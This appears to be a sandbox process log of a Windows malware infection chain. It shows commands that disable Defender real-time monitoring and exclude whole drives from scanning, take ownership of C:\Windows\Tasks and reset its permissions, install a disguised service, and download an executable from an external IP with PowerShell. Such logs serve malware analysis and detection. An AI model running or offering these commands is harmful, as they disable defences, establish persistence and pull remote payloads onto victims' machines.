powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2768powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
29081.exe "C:\programdata\1.exe" /D
3032chcp.com chcp 65001
2256cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
2376findstr.exe findstr /i "Platform"
2488powershell.exe powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2628find.exe find /I /N "Superfetch.exe"
1080tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2788takeown.exe takeown /f c:\windows\tasks
2412timeout.exe TIMEOUT /T 3 /NOBREAK
3012icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2116icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
2672icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
1404icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
2272icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2504icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2616icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
2744timeout.exe TIMEOUT /T 3 /NOBREAK
2832timeout.exe TIMEOUT /T 1 /NOBREAK
2720Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
2064timeout.exe TIMEOUT /T 1 /NOBREAK
1576Wmiic.exe "C:\windows\tasks\wmiic" start WMService
2820timeout.exe TIMEOUT /T 2 /NOBREAK
2944net1.exe C:\Windows\system32\net1 start WMService
2852timeout.exe TIMEOUT /T 3 /NOBREAK
2068powershell.exe powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
2316timeout.exe TIMEOUT /T 3 /NOBREAK
2996timeout.exe TIMEOUT /T 10 /NOBREAK
1400tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
452find.exe find /I /N "Superfetch.exe"
1632dc.exe "C:\programdata\dc.exe"
2988